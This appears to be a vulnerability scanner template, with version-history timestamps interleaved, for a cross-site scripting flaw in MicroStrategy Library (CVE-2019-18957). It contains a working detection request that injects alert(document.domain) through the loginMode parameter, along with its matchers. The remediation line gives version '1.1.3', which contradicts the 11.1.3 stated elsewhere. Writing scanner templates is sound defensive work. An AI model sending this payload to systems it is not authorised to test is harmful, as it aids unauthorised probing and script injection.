2022-10-10 04:34:13 +00:00
id : CVE-2019-18957
2022-10-19 21:11:27 +00:00
2022-10-10 04:34:13 +00:00
info :
2022-10-19 21:11:27 +00:00
name : MicroStrategy Library <11.1.3 - Cross-Site Scripting
2022-10-10 04:34:13 +00:00
author : tess
severity : medium
description : |
2022-10-19 21:11:27 +00:00
MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 12:53:28 +00:00
remediation : The issue can be resolved by downloading and installing 1.1.3, which has the patch.
2022-10-10 04:34:13 +00:00
reference :
2022-10-14 12:46:18 +00:00
- https://seclists.org/bugtraq/2019/Nov/23
2022-10-19 21:11:27 +00:00
- https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
2023-07-11 19:49:27 +00:00
- http://seclists.org/fulldisclosure/2019/Nov/4
2022-10-10 04:34:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-18957
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00247
2023-08-31 11:46:18 +00:00
epss-percentile : 0.61933
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microstrategy
product : microstrategy_library
tags : cve2019,microstrategy,packetstorm,xss,seclists,cve
2022-10-13 13:56:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-10 04:34:13 +00:00
- method : GET
path :
- "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-10-13 13:56:45 +00:00
- "previousLoginMode: alert(document.domain),"
2022-10-10 04:34:13 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200